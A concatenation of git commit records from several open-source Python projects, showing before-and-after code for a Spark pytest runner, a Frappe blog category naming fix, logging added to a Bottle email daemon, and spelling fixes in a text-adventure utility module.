sys.path.insert(0, dist)
pytestConfigArgs = sys.argv[1].replace("'", "").split(" ")
args = pytestConfigArgs + ["--dist", dist, "--spark_conf", ' '.join(sys.argv[3:])]
code = pytest.main(args)
sys.exit(code)
[SW-1610][FollowUp] Fix running python tests by changing the env directly
(cherry picked from commit 0d808a100cd14fce9d4fba4f9cde6ad5315fbc12)#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import pytest
dist = sys.argv[2]
path = os.getenv("PYTHONPATH")
if path is None:
path = dist
else:
path = "{}:{}".format(dist, path)
os.putenv("PYTHONPATH", path)
os.putenv('PYSPARK_DRIVER_PYTHON', sys.executable)
os.putenv('PYSPARK_PYTHON', sys.executable)
os.environ["PYTHONPATH"] = path
os.environ['PYSPARK_DRIVER_PYTHON'] = sys.executable
os.environ['PYSPARK_PYTHON'] = sys.executable
sys.path.insert(0, dist)
pytestConfigArgs = sys.argv[1].replace("'", "").split(" ")
args = pytestConfigArgs + ["--dist", dist, "--spark_conf", ' '.join(sys.argv[3:])]
code = pytest.main(args)
sys.exit(code)
|
<commit_before>#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import pytest
dist = sys.argv[2]
path = os.getenv("PYTHONPATH")
if path is None:
path = dist
else:
path = "{}:{}".format(dist, path)
os.environ["PYTHONPATH"] = path
os.environ['PYSPARK_DRIVER_PYTHON'] = sys.executable
os.environ['PYSPARK_PYTHON'] = sys.executable
sys.path.insert(0, dist)
pytestConfigArgs = sys.argv[1].replace("'", "").split(" ")
args = pytestConfigArgs + ["--dist", dist, "--spark_conf", ' '.join(sys.argv[3:])]
code = pytest.main(args)
sys.exit(code)
<commit_msg>[SW-1610][FollowUp] Fix running python tests by changing the env directly
(cherry picked from commit 0d808a100cd14fce9d4fba4f9cde6ad5315fbc12)<commit_after>#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import pytest
dist = sys.argv[2]
path = os.getenv("PYTHONPATH")
if path is None:
path = dist
else:
path = "{}:{}".format(dist, path)
os.putenv("PYTHONPATH", path)
os.putenv('PYSPARK_DRIVER_PYTHON', sys.executable)
os.putenv('PYSPARK_PYTHON', sys.executable)
os.environ["PYTHONPATH"] = path
os.environ['PYSPARK_DRIVER_PYTHON'] = sys.executable
os.environ['PYSPARK_PYTHON'] = sys.executable
sys.path.insert(0, dist)
pytestConfigArgs = sys.argv[1].replace("'", "").split(" ")
args = pytestConfigArgs + ["--dist", dist, "--spark_conf", ' '.join(sys.argv[3:])]
code = pytest.main(args)
sys.exit(code)
|
bc6999e5e587a5e4dfd8b65f168de8ebce8bc93b
|
webnotes/website/doctype/blog_category/blog_category.py
|
webnotes/website/doctype/blog_category/blog_category.py
|
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import webnotes
from webnotes.webutils import WebsiteGenerator, cleanup_page_name, clear_cache
class DocType(WebsiteGenerator):
def __init__(self, d, dl):
self.doc, self.doclist = d, dl
def get_page_title(self):
return self.doc.title
def on_update(self):
WebsiteGenerator.on_update(self)
from webnotes.webutils import clear_cache
clear_cache()
|
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import webnotes
from webnotes.webutils import WebsiteGenerator, cleanup_page_name, clear_cache
class DocType(WebsiteGenerator):
def __init__(self, d, dl):
self.doc, self.doclist = d, dl
def autoname(self):
# to override autoname of WebsiteGenerator
self.doc.name = self.doc.category_name
def get_page_title(self):
return self.doc.title
def on_update(self):
WebsiteGenerator.on_update(self)
from webnotes.webutils import clear_cache
clear_cache()
|
Fix in Blog Category Naming
|
Fix in Blog Category Naming
|
Python
|
mit
|
aboganas/frappe,RicardoJohann/frappe,gangadharkadam/letzfrappe,mbauskar/omnitech-demo-frappe,mhbu50/frappe,BhupeshGupta/frappe,gangadhar-kadam/laganfrappe,mbauskar/omnitech-frappe,shitolepriya/test-frappe,shitolepriya/test-frappe,mbauskar/tele-frappe,gangadharkadam/letzfrappe,gangadharkadam/frappecontribution,sbktechnology/trufil-frappe,saguas/frappe,gangadharkadam/frappecontribution,indictranstech/phr-frappe,pawaranand/phr_frappe,indictranstech/trufil-frappe,bcornwellmott/frappe,pombredanne/frappe,saurabh6790/test-frappe,rkawale/Internalhr-frappe,gangadhar-kadam/verve_live_frappe,ashokrajbathu/secondrep,gangadhar-kadam/helpdesk-frappe,rohitwaghchaure/vestasi-frappe,aboganas/frappe,praba230890/frappe,bohlian/frappe,suyashphadtare/propshikhari-frappe,gangadhar-kadam/hrfrappe,indictranstech/trufil-frappe,maxtorete/frappe,erpletzerp/letzerpcore,bcornwellmott/frappe,gangadharkadam/saloon_frappe,pranalik/frappe-bb,almeidapaulopt/frappe,rmehta/frappe,neilLasrado/frappe,mbauskar/Das_frappe,vCentre/vFRP-6233,gangadharkadam/v5_frappe,letzerp/framework,gangadharkadam/stfrappe,gangadharkadam/v6_frappe,mbauskar/phr-frappe,indictranstech/trufil-frappe,saguas/frappe,indictranstech/phr-frappe,gangadharkadam/saloon_frappe,adityahase/frappe,mbauskar/helpdesk-frappe,frappe/frappe,rmehta/frappe,praba230890/frappe,mbauskar/frappe,indautgrp/frappe,geo-poland/frappe,vCentre/vFRP-6233,indictranstech/frappe,indictranstech/tele-frappe,gangadhar-kadam/helpdesk-frappe,drukhil/frappe,drukhil/frappe,RicardoJohann/frappe,rohitwaghchaure/frappe-digitales,shitolepriya/test-frappe,mbauskar/Das_frappe,indictranstech/reciphergroup-frappe,rohitw1991/smarttailorfrappe,gangadhar-kadam/verve_test_frappe,suyashphadtare/propshikhari-frappe,indictranstech/phr-frappe,adityahase/frappe,mbauskar/frappe,rohitwaghchaure/vestasi-frappe,sbktechnology/trufil-frappe,yashodhank/frappe,rohitwaghchaure/frappe-alec,gangadharkadam/v4_frappe,deveninfotech/deven-frappe,indictranstech/Das_frappe,tmimori/frappe,gangadharkadam/saloon_frappe_install,saurabh6790/frappe,rohitwaghchaure/frappe,gangadhar-kadam/verve_test_frappe,suyashphadtare/propshikhari-frappe,drukhil/frappe,letzerp/framework,anandpdoshi/frappe,manassolanki/frappe,mbauskar/frappe,gangadharkadam/vlinkfrappe,pombredanne/frappe,adityahase/frappe,Tejal011089/digitales_frappe,vjFaLk/frappe,suyashphadtare/sajil-final-frappe,Amber-Creative/amber-frappe,pawaranand/phr_frappe,deveninfotech/deven-frappe,sbktechnology/sap_frappe,gangadhar-kadam/smrterpfrappe,hatwar/buyback-frappe,gangadharkadam/v4_frappe,indictranstech/Das_frappe,gangadharkadam/frappecontribution,tundebabzy/frappe,ShashaQin/frappe,mbauskar/omnitech-frappe,MaxMorais/frappe,ShashaQin/frappe,sbkolate/sap_frappe_v6,gangadharkadam/saloon_frappe,indictranstech/internal-frappe,gangadharkadam/tailorfrappe,drukhil/frappe,ashokrajbathu/secondrep,erpletzerp/letzerpcore,mbauskar/frappe,Amber-Creative/amber-frappe,StrellaGroup/frappe,shitolepriya/test-frappe,elba7r/frameworking,rmehta/frappe,gangadharkadam/vervefrappe,manassolanki/frappe,paurosello/frappe,sbkolate/sap_frappe_v6,rohitwaghchaure/New_Theme_frappe,reachalpineswift/frappe-bench,elba7r/builder,bcornwellmott/frappe,gangadharkadam/smrtfrappe,pombredanne/frappe,gangadharkadam/stfrappe,indictranstech/frappe,mbauskar/omnitech-demo-frappe,suyashphadtare/propshikhari-frappe,gangadhar-kadam/verve_live_frappe,indictranstech/frappe,tmimori/frappe,anandpdoshi/frappe,cadencewatches/frappe,gangadharkadam/saloon_frappe_install,manassolanki/frappe,mbauskar/phr-frappe,rohitwaghchaure/frappe-alec,rohitwaghchaure/New_Theme_frappe,frappe/frappe,almeidapaulopt/frappe,indictranstech/Das_frappe,indictranstech/fbd_frappe,chdecultot/frappe,bohlian/frappe,Tejal011089/digitales_frappe,sbkolate/sap_frappe_v6,rohitw1991/smarttailorfrappe,sbktechnology/trufil-frappe,rohitwaghchaure/frappe-digitales,gangadharkadam/smrtfrappe,indictranstech/internal-frappe,rohitwaghchaure/vestasi-frappe,gangadhar-kadam/helpdesk-frappe,RicardoJohann/frappe,ShashaQin/frappe,gangadharkadam/office_frappe,mbauskar/tele-frappe,vjFaLk/frappe,pranalik/frappe-bb,praba230890/frappe,MaxMorais/frappe,rohitwaghchaure/frappe-alec,indictranstech/ebuy-now-frappe,suyashphadtare/sajil-final-frappe,maxtorete/frappe,saurabh6790/phr-frappe,hatwar/buyback-frappe,deveninfotech/deven-frappe,mbauskar/Das_frappe,maxtorete/frappe,pranalik/frappe-bb,hernad/frappe,indictranstech/ebuy-now-frappe,saguas/frappe,gangadharkadam/v5_frappe,elba7r/frameworking,sbktechnology/trufil-frappe,pranalik/frappe-bb,indictranstech/reciphergroup-frappe,rohitwaghchaure/New_Theme_frappe,indictranstech/internal-frappe,indautgrp/frappe,saurabh6790/test-frappe,ESS-LLP/frappe,tundebabzy/frappe,gangadharkadam/johnfrappe,indictranstech/osmosis-frappe,gangadhar-kadam/laganfrappe,mhbu50/frappe,tundebabzy/frappe,rohitw1991/smartfrappe,erpletzerp/letzerpcore,gangadhar-kadam/lgnlvefrape,jevonearth/frappe,indautgrp/frappe,rohitwaghchaure/frappe-digitales,StrellaGroup/frappe,gangadharkadam/office_frappe,neilLasrado/frappe,vCentre/vFRP-6233,gangadharkadam/v6_frappe,gangadharkadam/v6_frappe,mbauskar/helpdesk-frappe,StrellaGroup/frappe,indictranstech/osmosis-frappe,ESS-LLP/frappe,tundebabzy/frappe,gangadharkadam/office_frappe,indictranstech/internal-frappe,BhupeshGupta/frappe,vqw/frappe,gangadharkadam/v6_frappe,gangadharkadam/vlinkfrappe,indautgrp/frappe,yashodhank/frappe,indictranstech/frappe-digitales,gangadhar-kadam/verve_live_frappe,mbauskar/omnitech-demo-frappe,tmimori/frappe,indictranstech/ebuy-now-frappe,sbktechnology/sap_frappe,gangadhar-kadam/helpdesk-frappe,letzerp/framework,aboganas/frappe,gangadharkadam/vervefrappe,indictranstech/tele-frappe,MaxMorais/frappe,paurosello/frappe,gangadharkadam/v4_frappe,letzerp/framework,gangadhar-kadam/lgnlvefrape,praba230890/frappe,BhupeshGupta/frappe,hatwar/buyback-frappe,pawaranand/phr-frappe,mbauskar/tele-frappe,indictranstech/omnitech-frappe,ESS-LLP/frappe,mbauskar/phr-frappe,Tejal011089/digitales_frappe,indictranstech/ebuy-now-frappe,indictranstech/frappe,almeidapaulopt/frappe,gangadharkadam/vervefrappe,rohitwaghchaure/frappe,suyashphadtare/sajil-frappe,mbauskar/omnitech-frappe,gangadhar-kadam/verve_frappe,Amber-Creative/amber-frappe,saurabh6790/test-frappe,gangadhar-kadam/verve_test_frappe,mhbu50/frappe,vqw/frappe,gangadharkadam/v5_frappe,pawaranand/phr-frappe,saguas/frappe,pawaranand/phr_frappe,gangadharkadam/vlinkfrappe,cadencewatches/frappe,saurabh6790/phr-frappe,suyashphadtare/sajil-final-frappe,indictranstech/tele-frappe,rohitw1991/frappe,suyashphadtare/sajil-frappe,deveninfotech/deven-frappe,aboganas/frappe,indictranstech/osmosis-frappe,indictranstech/osmosis-frappe,MaxMorais/frappe,gangadharkadam/vlinkfrappe,Amber-Creative/amber-frappe,gangadhar-kadam/verve_test_frappe,neilLasrado/frappe,gangadhar-kadam/lgnlvefrape,Tejal011089/digitales_frappe,nerevu/frappe,indictranstech/fbd_frappe,reachalpineswift/frappe-bench,nerevu/frappe,yashodhank/frappe,ashokrajbathu/secondrep,gangadhar-kadam/verve_frappe,mbauskar/phr-frappe,mbauskar/Das_frappe,rohitwaghchaure/frappe_smart,gangadharkadam/saloon_frappe,rohitwaghchaure/frappe_smart,chdecultot/frappe,anandpdoshi/frappe,nerevu/frappe,mbauskar/omnitech-demo-frappe,vjFaLk/frappe,mbauskar/tele-frappe,gangadharkadam/saloon_frappe_install,jevonearth/frappe,elba7r/builder,indictranstech/reciphergroup-frappe,geo-poland/frappe,yashodhank/frappe,suyashphadtare/sajil-frappe,rmehta/frappe,indictranstech/fbd_frappe,indictranstech/fbd_frappe,gangadhar-kadam/verve_frappe,ashokrajbathu/secondrep,mbauskar/helpdesk-frappe,jevonearth/frappe,ShashaQin/frappe,bohlian/frappe,mbauskar/omnitech-frappe,almeidapaulopt/frappe,vqw/frappe,gangadharkadam/letzfrappe,rohitwaghchaure/frappe,gangadharkadam/letzfrappe,gangadharkadam/shfr,gangadharkadam/johnfrappe,gangadhar-kadam/laganfrappe,rohitwaghchaure/frappe-digitales,saurabh6790/test-frappe,RicardoJohann/frappe,sbktechnology/sap_frappe,sbktechnology/sap_frappe,indictranstech/trufil-frappe,gangadharkadam/tailorfrappe,rohitw1991/frappe,pawaranand/phr-frappe,vjFaLk/frappe,gangadharkadam/frappecontribution,indictranstech/omnitech-frappe,bohlian/frappe,indictranstech/tele-frappe,chdecultot/frappe,rohitwaghchaure/frappe,sbkolate/sap_frappe_v6,elba7r/builder,indictranstech/omnitech-frappe,gangadharkadam/shfr,bcornwellmott/frappe,hernad/frappe,saurabh6790/frappe,indictranstech/Das_frappe,nerevu/frappe,vCentre/vFRP-6233,reachalpineswift/frappe-bench,manassolanki/frappe,indictranstech/frappe-digitales,mbauskar/helpdesk-frappe,indictranstech/frappe-digitales,anandpdoshi/frappe,erpletzerp/letzerpcore,chdecultot/frappe,gangadhar-kadam/hrfrappe,gangadharkadam/v4_frappe,BhupeshGupta/frappe,jevonearth/frappe,indictranstech/reciphergroup-frappe,maxtorete/frappe,pombredanne/frappe,rohitw1991/smartfrappe,saurabh6790/phr-frappe,rohitwaghchaure/vestasi-frappe,frappe/frappe,gangadhar-kadam/verve_live_frappe,ESS-LLP/frappe,gangadharkadam/vervefrappe,saurabh6790/frappe,elba7r/builder,saurabh6790/phr-frappe,indictranstech/omnitech-frappe,hernad/frappe,gangadharkadam/saloon_frappe_install,saurabh6790/frappe,elba7r/frameworking,adityahase/frappe,vqw/frappe,gangadhar-kadam/verve_frappe,gangadhar-kadam/smrterpfrappe,pawaranand/phr_frappe,rkawale/Internalhr-frappe,paurosello/frappe,reachalpineswift/frappe-bench,geo-poland/frappe,mhbu50/frappe,elba7r/frameworking,indictranstech/phr-frappe,neilLasrado/frappe,gangadharkadam/v5_frappe,hatwar/buyback-frappe,paurosello/frappe,indictranstech/frappe-digitales,tmimori/frappe,hernad/frappe
|
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import webnotes
from webnotes.webutils import WebsiteGenerator, cleanup_page_name, clear_cache
class DocType(WebsiteGenerator):
def __init__(self, d, dl):
self.doc, self.doclist = d, dl
def get_page_title(self):
return self.doc.title
def on_update(self):
WebsiteGenerator.on_update(self)
from webnotes.webutils import clear_cache
clear_cache()
Fix in Blog Category Naming
|
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import webnotes
from webnotes.webutils import WebsiteGenerator, cleanup_page_name, clear_cache
class DocType(WebsiteGenerator):
def __init__(self, d, dl):
self.doc, self.doclist = d, dl
def autoname(self):
# to override autoname of WebsiteGenerator
self.doc.name = self.doc.category_name
def get_page_title(self):
return self.doc.title
def on_update(self):
WebsiteGenerator.on_update(self)
from webnotes.webutils import clear_cache
clear_cache()
|
<commit_before># Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import webnotes
from webnotes.webutils import WebsiteGenerator, cleanup_page_name, clear_cache
class DocType(WebsiteGenerator):
def __init__(self, d, dl):
self.doc, self.doclist = d, dl
def get_page_title(self):
return self.doc.title
def on_update(self):
WebsiteGenerator.on_update(self)
from webnotes.webutils import clear_cache
clear_cache()
<commit_msg>Fix in Blog Category Naming<commit_after>
|
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import webnotes
from webnotes.webutils import WebsiteGenerator, cleanup_page_name, clear_cache
class DocType(WebsiteGenerator):
def __init__(self, d, dl):
self.doc, self.doclist = d, dl
def autoname(self):
# to override autoname of WebsiteGenerator
self.doc.name = self.doc.category_name
def get_page_title(self):
return self.doc.title
def on_update(self):
WebsiteGenerator.on_update(self)
from webnotes.webutils import clear_cache
clear_cache()
|
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import webnotes
from webnotes.webutils import WebsiteGenerator, cleanup_page_name, clear_cache
class DocType(WebsiteGenerator):
def __init__(self, d, dl):
self.doc, self.doclist = d, dl
def get_page_title(self):
return self.doc.title
def on_update(self):
WebsiteGenerator.on_update(self)
from webnotes.webutils import clear_cache
clear_cache()
Fix in Blog Category Naming# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import webnotes
from webnotes.webutils import WebsiteGenerator, cleanup_page_name, clear_cache
class DocType(WebsiteGenerator):
def __init__(self, d, dl):
self.doc, self.doclist = d, dl
def autoname(self):
# to override autoname of WebsiteGenerator
self.doc.name = self.doc.category_name
def get_page_title(self):
return self.doc.title
def on_update(self):
WebsiteGenerator.on_update(self)
from webnotes.webutils import clear_cache
clear_cache()
|
<commit_before># Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import webnotes
from webnotes.webutils import WebsiteGenerator, cleanup_page_name, clear_cache
class DocType(WebsiteGenerator):
def __init__(self, d, dl):
self.doc, self.doclist = d, dl
def get_page_title(self):
return self.doc.title
def on_update(self):
WebsiteGenerator.on_update(self)
from webnotes.webutils import clear_cache
clear_cache()
<commit_msg>Fix in Blog Category Naming<commit_after># Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import webnotes
from webnotes.webutils import WebsiteGenerator, cleanup_page_name, clear_cache
class DocType(WebsiteGenerator):
def __init__(self, d, dl):
self.doc, self.doclist = d, dl
def autoname(self):
# to override autoname of WebsiteGenerator
self.doc.name = self.doc.category_name
def get_page_title(self):
return self.doc.title
def on_update(self):
WebsiteGenerator.on_update(self)
from webnotes.webutils import clear_cache
clear_cache()
|
3ec2cc49a68894572f2eafc9172f4140791b6fc5
|
sremailer.py
|
sremailer.py
|
#!/usr/bin/env python
# This Source Code Form is subject to the terms of the Mozilla Public License,
# v. 2.0. If a copy of the MPL was not distributed with this file, You can
# obtain one at http://mozilla.org/MPL/2.0/.
import bottle
import stoneridge
@bottle.post('/email')
def email():
r = bottle.request.forms
to = r.get('to')
subject = r.get('subject')
msg = r.get('message')
stoneridge.sendmail(to, subject, msg)
def daemon():
stoneridge.StreamLogger.bottle_inject()
bottle.run(host='0.0.0.0', port=2255)
@stoneridge.main
def main():
parser = stoneridge.DaemonArgumentParser()
parser.parse_args()
parser.start_daemon(daemon)
|
#!/usr/bin/env python
# This Source Code Form is subject to the terms of the Mozilla Public License,
# v. 2.0. If a copy of the MPL was not distributed with this file, You can
# obtain one at http://mozilla.org/MPL/2.0/.
import bottle
import logging
import stoneridge
@bottle.post('/email')
def email():
logging.debug('handling email')
r = bottle.request.forms
to = r.get('to')
logging.debug('to: %s' % (to,))
subject = r.get('subject')
logging.debug('subject: %s' % (subject,))
msg = r.get('message')
logging.debug('message: %s' % (msg,))
stoneridge.sendmail(to, subject, msg)
def daemon():
stoneridge.StreamLogger.bottle_inject()
bottle.run(host='0.0.0.0', port=2255)
@stoneridge.main
def main():
parser = stoneridge.DaemonArgumentParser()
parser.parse_args()
parser.start_daemon(daemon)
|
Add logging to email daemon
|
Add logging to email daemon
|
Python
|
mpl-2.0
|
mozilla/stoneridge,mozilla/stoneridge,mozilla/stoneridge,mozilla/stoneridge,mozilla/stoneridge,mozilla/stoneridge,mozilla/stoneridge,mozilla/stoneridge
|
#!/usr/bin/env python
# This Source Code Form is subject to the terms of the Mozilla Public License,
# v. 2.0. If a copy of the MPL was not distributed with this file, You can
# obtain one at http://mozilla.org/MPL/2.0/.
import bottle
import stoneridge
@bottle.post('/email')
def email():
r = bottle.request.forms
to = r.get('to')
subject = r.get('subject')
msg = r.get('message')
stoneridge.sendmail(to, subject, msg)
def daemon():
stoneridge.StreamLogger.bottle_inject()
bottle.run(host='0.0.0.0', port=2255)
@stoneridge.main
def main():
parser = stoneridge.DaemonArgumentParser()
parser.parse_args()
parser.start_daemon(daemon)
Add logging to email daemon
|
#!/usr/bin/env python
# This Source Code Form is subject to the terms of the Mozilla Public License,
# v. 2.0. If a copy of the MPL was not distributed with this file, You can
# obtain one at http://mozilla.org/MPL/2.0/.
import bottle
import logging
import stoneridge
@bottle.post('/email')
def email():
logging.debug('handling email')
r = bottle.request.forms
to = r.get('to')
logging.debug('to: %s' % (to,))
subject = r.get('subject')
logging.debug('subject: %s' % (subject,))
msg = r.get('message')
logging.debug('message: %s' % (msg,))
stoneridge.sendmail(to, subject, msg)
def daemon():
stoneridge.StreamLogger.bottle_inject()
bottle.run(host='0.0.0.0', port=2255)
@stoneridge.main
def main():
parser = stoneridge.DaemonArgumentParser()
parser.parse_args()
parser.start_daemon(daemon)
|
<commit_before>#!/usr/bin/env python
# This Source Code Form is subject to the terms of the Mozilla Public License,
# v. 2.0. If a copy of the MPL was not distributed with this file, You can
# obtain one at http://mozilla.org/MPL/2.0/.
import bottle
import stoneridge
@bottle.post('/email')
def email():
r = bottle.request.forms
to = r.get('to')
subject = r.get('subject')
msg = r.get('message')
stoneridge.sendmail(to, subject, msg)
def daemon():
stoneridge.StreamLogger.bottle_inject()
bottle.run(host='0.0.0.0', port=2255)
@stoneridge.main
def main():
parser = stoneridge.DaemonArgumentParser()
parser.parse_args()
parser.start_daemon(daemon)
<commit_msg>Add logging to email daemon<commit_after>
|
#!/usr/bin/env python
# This Source Code Form is subject to the terms of the Mozilla Public License,
# v. 2.0. If a copy of the MPL was not distributed with this file, You can
# obtain one at http://mozilla.org/MPL/2.0/.
import bottle
import logging
import stoneridge
@bottle.post('/email')
def email():
logging.debug('handling email')
r = bottle.request.forms
to = r.get('to')
logging.debug('to: %s' % (to,))
subject = r.get('subject')
logging.debug('subject: %s' % (subject,))
msg = r.get('message')
logging.debug('message: %s' % (msg,))
stoneridge.sendmail(to, subject, msg)
def daemon():
stoneridge.StreamLogger.bottle_inject()
bottle.run(host='0.0.0.0', port=2255)
@stoneridge.main
def main():
parser = stoneridge.DaemonArgumentParser()
parser.parse_args()
parser.start_daemon(daemon)
|
#!/usr/bin/env python
# This Source Code Form is subject to the terms of the Mozilla Public License,
# v. 2.0. If a copy of the MPL was not distributed with this file, You can
# obtain one at http://mozilla.org/MPL/2.0/.
import bottle
import stoneridge
@bottle.post('/email')
def email():
r = bottle.request.forms
to = r.get('to')
subject = r.get('subject')
msg = r.get('message')
stoneridge.sendmail(to, subject, msg)
def daemon():
stoneridge.StreamLogger.bottle_inject()
bottle.run(host='0.0.0.0', port=2255)
@stoneridge.main
def main():
parser = stoneridge.DaemonArgumentParser()
parser.parse_args()
parser.start_daemon(daemon)
Add logging to email daemon#!/usr/bin/env python
# This Source Code Form is subject to the terms of the Mozilla Public License,
# v. 2.0. If a copy of the MPL was not distributed with this file, You can
# obtain one at http://mozilla.org/MPL/2.0/.
import bottle
import logging
import stoneridge
@bottle.post('/email')
def email():
logging.debug('handling email')
r = bottle.request.forms
to = r.get('to')
logging.debug('to: %s' % (to,))
subject = r.get('subject')
logging.debug('subject: %s' % (subject,))
msg = r.get('message')
logging.debug('message: %s' % (msg,))
stoneridge.sendmail(to, subject, msg)
def daemon():
stoneridge.StreamLogger.bottle_inject()
bottle.run(host='0.0.0.0', port=2255)
@stoneridge.main
def main():
parser = stoneridge.DaemonArgumentParser()
parser.parse_args()
parser.start_daemon(daemon)
|
<commit_before>#!/usr/bin/env python
# This Source Code Form is subject to the terms of the Mozilla Public License,
# v. 2.0. If a copy of the MPL was not distributed with this file, You can
# obtain one at http://mozilla.org/MPL/2.0/.
import bottle
import stoneridge
@bottle.post('/email')
def email():
r = bottle.request.forms
to = r.get('to')
subject = r.get('subject')
msg = r.get('message')
stoneridge.sendmail(to, subject, msg)
def daemon():
stoneridge.StreamLogger.bottle_inject()
bottle.run(host='0.0.0.0', port=2255)
@stoneridge.main
def main():
parser = stoneridge.DaemonArgumentParser()
parser.parse_args()
parser.start_daemon(daemon)
<commit_msg>Add logging to email daemon<commit_after>#!/usr/bin/env python
# This Source Code Form is subject to the terms of the Mozilla Public License,
# v. 2.0. If a copy of the MPL was not distributed with this file, You can
# obtain one at http://mozilla.org/MPL/2.0/.
import bottle
import logging
import stoneridge
@bottle.post('/email')
def email():
logging.debug('handling email')
r = bottle.request.forms
to = r.get('to')
logging.debug('to: %s' % (to,))
subject = r.get('subject')
logging.debug('subject: %s' % (subject,))
msg = r.get('message')
logging.debug('message: %s' % (msg,))
stoneridge.sendmail(to, subject, msg)
def daemon():
stoneridge.StreamLogger.bottle_inject()
bottle.run(host='0.0.0.0', port=2255)
@stoneridge.main
def main():
parser = stoneridge.DaemonArgumentParser()
parser.parse_args()
parser.start_daemon(daemon)
|
37bedf8495834f0773f8a082c3f358321ebb8f77
|
src/utils.py
|
src/utils.py
|
import os
vowels = ['a e i o u']
constanents = ['b c d f g h j k l m n p q r s t v w x y z 1 2 3 4 \
5 6 7 8 9 0']
def inInventory(itemClass, player):
for item in player.inventory:
if isinstance(item, itemClass):
return True
break
return False
def getItemFromName(itemName, itemList, player):
for item in itemList:
if itemName == item.name:
return item
return False
def getIndefArticle(noun):
if noun[0] in vowels.split(' '):
return 'an'
elif noun[0] in constanents.split(' '):
return 'a'
def clrscn():
os.system("cls" if os.name == "nt" else "clear")
|
import os
vowels = ['a e i o u'].split(' ')
consonants = ['b c d f g h j k l m n p q r s t v w x y z 1 2 3 4 \
5 6 7 8 9 0'].split(' ')
def inInventory(itemClass, player):
for item in player.inventory:
if isinstance(item, itemClass):
return True
break
return False
def getItemFromName(itemName, itemList, player):
for item in itemList:
if itemName == item.name:
return item
return False
def getIndefArticle(noun):
if noun[0] in vowels:
return 'an'
elif noun[0] in consonants:
return 'a'
def clrscn():
os.system("cls" if os.name == "nt" else "clear")
|
Fix @DaVinci789's crappy spelling >:)
|
Fix @DaVinci789's crappy spelling >:)
|
Python
|
mit
|
allanburleson/python-adventure-game,disorientedperson/python-adventure-game
|
import os
vowels = ['a e i o u']
constanents = ['b c d f g h j k l m n p q r s t v w x y z 1 2 3 4 \
5 6 7 8 9 0']
def inInventory(itemClass, player):
for item in player.inventory:
if isinstance(item, itemClass):
return True
break
return False
def getItemFromName(itemName, itemList, player):
for item in itemList:
if itemName == item.name:
return item
return False
def getIndefArticle(noun):
if noun[0] in vowels.split(' '):
return 'an'
elif noun[0] in constanents.split(' '):
return 'a'
def clrscn():
os.system("cls" if os.name == "nt" else "clear")
Fix @DaVinci789's crappy spelling >:)
|
import os
vowels = ['a e i o u'].split(' ')
consonants = ['b c d f g h j k l m n p q r s t v w x y z 1 2 3 4 \
5 6 7 8 9 0'].split(' ')
def inInventory(itemClass, player):
for item in player.inventory:
if isinstance(item, itemClass):
return True
break
return False
def getItemFromName(itemName, itemList, player):
for item in itemList:
if itemName == item.name:
return item
return False
def getIndefArticle(noun):
if noun[0] in vowels:
return 'an'
elif noun[0] in consonants:
return 'a'
def clrscn():
os.system("cls" if os.name == "nt" else "clear")
|
<commit_before>import os
vowels = ['a e i o u']
constanents = ['b c d f g h j k l m n p q r s t v w x y z 1 2 3 4 \
5 6 7 8 9 0']
def inInventory(itemClass, player):
for item in player.inventory:
if isinstance(item, itemClass):
return True
break
return False
def getItemFromName(itemName, itemList, player):
for item in itemList:
if itemName == item.name:
return item
return False
def getIndefArticle(noun):
if noun[0] in vowels.split(' '):
return 'an'
elif noun[0] in constanents.split(' '):
return 'a'
def clrscn():
os.system("cls" if os.name == "nt" else "clear")
<commit_msg>Fix @DaVinci789's crappy spelling >:)<commit_after>
|
import os
vowels = ['a e i o u'].split(' ')
consonants = ['b c d f g h j k l m n p q r s t v w x y z 1 2 3 4 \
5 6 7 8 9 0'].split(' ')
def inInventory(itemClass, player):
for item in player.inventory:
if isinstance(item, itemClass):
